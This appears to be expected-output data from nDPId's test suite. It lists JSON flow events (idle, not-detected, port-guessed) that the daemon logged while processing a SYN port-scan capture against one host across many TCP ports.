-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
